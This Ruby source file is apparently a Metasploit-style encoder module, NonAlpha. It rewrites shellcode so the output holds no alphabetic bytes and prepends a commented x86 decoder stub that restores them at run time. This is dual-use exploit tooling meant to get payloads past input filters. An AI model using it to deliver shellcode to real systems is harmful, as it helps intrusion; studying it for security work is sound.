#!/usr/bin/env ruby
require 'rex/text'
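module Rex
module Encoder

###
#
# Rex::Encoder::NonAlpha
#
# Rewrites a buffer so that it contains no ASCII-alphabetic bytes (A-Z, a-z)
# and prefixes a short x86 decoder stub that restores them at run time.  The
# output layout is:
#
#   [decoder stub (36 bytes)][table][payload, alphabetic bytes -> MAGIC]
#
# Every alphabetic byte of the input is replaced by MAGIC in the payload, and
# the difference (MAGIC - original) is appended to the table, in input order.
# The stub walks the table; for each entry it locates the next MAGIC in the
# payload with `repne scasb` and subtracts the entry from it, which yields
# the original byte again.
#
###
class NonAlpha

  # Marker written into the payload in place of each alphabetic byte, and the
  # value the stub's `scasb` searches for.  An input byte equal to MAGIC is
  # rejected, since the stub could not distinguish it from a marker.
  MAGIC = 0x7B

  # Placeholder bytes in DECODER that encode() patches once the table size is
  # known: 'A' becomes the table length (operand of `add edi, imm8`), 'B' the
  # distance from the stub's final short jump to the payload (`jmp rel8`).
  TABLELEN_PLACEHOLDER = 0x41 # 'A'
  JMP_PLACEHOLDER      = 0x42 # 'B'

  # Length of the stub's trailing `call` instruction, which sits between the
  # patched `jmp rel8` and the start of the table.  The jump distance into
  # the payload is therefore tablelen + JMP_TAIL_LEN.
  JMP_TAIL_LEN = 5

  # Both patched operands are sign-extended 8-bit immediates, so neither may
  # exceed 127 (the original 255 limit let values of 128..255 through, which
  # the CPU reads as negative).  The jump distance (tablelen + JMP_TAIL_LEN)
  # is the larger of the two, which bounds the table at 122 entries.
  MAX_TABLE_LEN = 127 - JMP_TAIL_LEN

  # The decoder stub, one array row per instruction.  Offsets in the comments
  # count from the byte after `jmp +0x19` (offset 0 = `pop esi`); the table
  # begins at offset 30, directly after the `call`.
  DECODER = [
    0x66, 0xB9, 0xFF, 0xFF,           #     mov cx, 0xFFFF  - bound the scasb scan
    0xEB, 0x19,                       #     jmp +0x19       - to the call at offset 25
    0x5E,                             #  0: pop esi         - esi = address of the table
    0x8B, 0xFE,                       #  1: mov edi, esi
    0x83, 0xC7, TABLELEN_PLACEHOLDER, #  3: add edi, imm8   - edi = start of the payload
    0x8B, 0xD7,                       #  6: mov edx, edi    - edx = end of the table
    0x3B, 0xF2,                       #  8: cmp esi, edx
    0x7D, 0x0B,                       # 10: jge +0x0B       - table exhausted: to offset 23
    0xB0, MAGIC,                      # 12: mov al, MAGIC
    0xF2, 0xAE,                       # 14: repne scasb     - edi = one past the next MAGIC
    0xFF, 0xCF,                       # 16: dec edi         - edi = the MAGIC byte itself
    0xAC,                             # 18: lodsb           - al = next table entry; esi += 1
    0x28, 0x07,                       # 19: sub [edi], al   - MAGIC - entry = original byte
    0xEB, 0xF1,                       # 21: jmp -0x0F       - back to the cmp at offset 8
    0xEB, JMP_PLACEHOLDER,            # 23: jmp rel8        - over the table into the payload
    0xE8, 0xE2, 0xFF, 0xFF, 0xFF      # 25: call -0x1E      - to offset 0; pushes table address
  ].freeze

  #
  # Returns the decoder stub as a binary String with the two placeholder
  # bytes ('A', 'B') still unpatched.  encode() fills them in; until it does
  # the stub's operands are meaningless.
  #
  def self.gen_decoder
    DECODER.pack('C*')
  end

  #
  # Encodes one byte of the payload.
  #
  # block    - the input byte as an Integer (0..255).
  # table    - the table built so far (String).  Never mutated; a new String
  #            is returned when an entry is appended.
  # tablelen - number of entries currently in table.
  #
  # Returns [encoded byte as a one-character String, table, tablelen].
  # Alphabetic bytes come back as MAGIC with (MAGIC - block) appended to the
  # table; every other byte passes through unchanged.
  #
  # Raises RuntimeError ("BadChar") when block equals MAGIC, which cannot be
  # represented, or when block is alphabetic and the table already holds
  # MAX_TABLE_LEN entries.
  #
  def self.encode_byte(block, table, tablelen)
    raise RuntimeError, "BadChar" if block == MAGIC

    if alpha?(block)
      # A 123rd entry would push the jump distance past what rel8 can hold.
      raise RuntimeError, "BadChar" if tablelen >= MAX_TABLE_LEN

      # Table entries are always in 0x01..0x3A, so they are never alphabetic.
      table    = table + [MAGIC - block].pack('C')
      tablelen += 1
      block    = MAGIC
    end

    [[block].pack('C'), table, tablelen]
  end

  #
  # Encodes buf and returns stub + table + payload as one binary String.
  #
  # buf - the bytes to encode (String); each_byte supplies Integers, which is
  #       what encode_byte expects (the old `block.unpack` call on an Integer
  #       raised NoMethodError).
  #
  # Raises RuntimeError ("BadChar") when buf contains MAGIC or more alphabetic
  # bytes than MAX_TABLE_LEN.
  #
  # NOTE(review): the two patched operands (tablelen and tablelen + 5) are not
  # themselves checked against the alphabetic range, so a table of e.g. 65
  # entries puts an 'A' byte back into the output.
  #
  def self.encode(buf)
    table    = ""
    tablelen = 0
    payload  = []

    buf.each_byte do |block|
      newchar, table, tablelen = encode_byte(block, table, tablelen)
      payload << newchar
    end

    # Patch the placeholders by position rather than with a regexp: the stub
    # is not valid text, and the old gsub! also passed an Integer replacement.
    stub = DECODER.dup
    stub[stub.index(TABLELEN_PLACEHOLDER)] = tablelen
    stub[stub.index(JMP_PLACEHOLDER)]      = tablelen + JMP_TAIL_LEN

    stub.pack('C*') + table + payload.join
  end

  #
  # True when byte is an ASCII letter (A-Z or a-z), the range this encoder
  # removes from its output.
  #
  def self.alpha?(byte)
    (0x41..0x5A).include?(byte) || (0x61..0x7A).include?(byte)
  end
  private_class_method :alpha?

end
end
end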